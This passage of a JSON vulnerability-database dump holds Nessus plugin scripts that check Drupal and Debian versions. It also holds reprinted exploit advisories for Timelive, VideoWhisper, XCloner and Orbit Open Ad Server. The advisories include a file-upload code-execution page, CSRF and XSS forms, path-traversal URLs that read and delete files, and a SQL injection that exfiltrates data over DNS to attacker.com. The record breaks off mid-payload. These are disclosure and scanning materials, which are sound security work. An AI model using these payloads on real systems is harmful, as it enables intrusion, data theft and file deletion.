"cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_7_27.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73635", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73635);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-2014-2983\");\n script_bugtraq_id(66977);\n\n script_name(english:\"Drupal 7.x < 7.27 Forms API Information Disclosure\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nan information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is 7.x prior\nto 7.27. It is, therefore, affected by an error related to the HTML\nform API and the caching of pages for different anonymous users, which\ncould allow sensitive information to be disclosed. Note that Drupal\ncore does not expose any such HTML forms by default.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2014-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/drupal-7.27-release-notes\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 7.27 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\nurl = build_url(qs:dir, port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfix = '7.27';\nif (version =~ \"^7\\.([0-9]|1[0-9]|2[0-6])($|[^0-9]+)\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:32:37", "references": ["https://packages.debian.org/source/squeeze/drupal6", "http://www.debian.org/security/2014/dsa-2914", "https://drupal.org/SA-CORE-2014-002"], "pluginID": "73715", "description": "An information disclosure vulnerability was discovered in Drupal, a fully-featured content management framework. When pages are cached for anonymous users, form state may leak between anonymous users.\nSensitive or private information recorded for one anonymous user could thus be disclosed to other users interacting with the same form at the same time.\n\nThis security update introduces small API changes, see the upstream advisory at drupal.org/SA-CORE-2014-002 for further information.", "edition": 4, "reporter": "Tenable", "published": "2014-04-27T00:00:00", "title": "Debian DSA-2914-1 : drupal6 - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2015-02-16T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:drupal6"], "id": "DEBIAN_DSA-2914.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73715", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2914. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73715);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/02/16 15:43:11 $\");\n\n script_cve_id(\"CVE-2014-2983\");\n script_bugtraq_id(66977);\n script_xref(name:\"DSA\", value:\"2914\");\n\n script_name(english:\"Debian DSA-2914-1 : drupal6 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users.\nSensitive or private information recorded for one anonymous user could\nthus be disclosed to other users interacting with the same form at the\nsame time.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 for further information.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://drupal.org/SA-CORE-2014-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/drupal6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-2914\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal6 packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 6.31-1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"drupal6\", reference:\"6.31-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-01-24T19:20:15", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "Richard Hatch", "published": "2014-04-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Livetecs Timelive 6.2.71 Unauthenticated Access / File Upload Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2042", "CVE-2014-1217"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22178", "href": "https://0day.today/exploit/description/22178", "sourceData": "Vulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering \"timelive default credentials\"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the \"My Projects\"..\"Manage Project\" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n\"Read and Execute\".\r\n\r\n1. Using any text editor create a new file \"run-cacl.aspx\" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language=\"VB\" %>\r\n <%\r\n System.Diagnostics.Process.Start(\"calc.exe\")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click \"My Projects\" from the left-hand menu\r\n4. Click the \"Manage\" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click \"Attachment\"\r\n6. Click \"Browse\" and navigate to to where you saved \"run-cacl.exe\"\r\n7. Click \"Upload\"\r\n8. Logout of TimeLive [Optional]\r\n9. On the server hosting the TimeLive application run \"TaskMgr\"\r\n9. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n10. Observe \"calc.exe\" running as \"NETWORK_SERVICE\" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the \"1/1\" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\n\n# 0day.today [2018-01-24] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22178"}, {"lastseen": "2018-03-28T03:18:48", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-02-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1905"], "modified": "2014-02-28T00:00:00", "id": "1337DAY-ID-21955", "href": "https://0day.today/exploit/description/21955", "sourceData": "Product: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n \r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n \r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n \r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n \r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n \r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n \r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u00e2??s widget. The script will be also executed in administrative section on the following page:\r\n \r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n \r\nThe code will be executed when the user visits the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n \r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n \r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n \r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n \r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n \r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n \r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nSolution:\r\n \r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21955"}, {"lastseen": "2018-01-10T01:12:35", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "High-Tech Bridge", "published": "2014-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2340"], "modified": "2014-04-04T00:00:00", "id": "1337DAY-ID-22100", "href": "https://0day.today/exploit/description/22100", "sourceData": "Product: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014\r\nVendor Patch: March 13, 2014\r\nPublic Disclosure: April 2, 2014\r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low\r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.\r\n \r\n \r\n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n \r\nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.\r\n \r\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:\r\n \r\n \r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to XCloner 3.1.1\r\n \r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22100"}, {"lastseen": "2018-02-10T11:18:22", "references": [], "description": "Orbit Open Ad Server version 1.1.0 suffers from a remote SQL injection vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Orbit Open Ad Server 1.1.0 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2540"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22127", "href": "https://0day.today/exploit/description/22127", "sourceData": "Product: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" 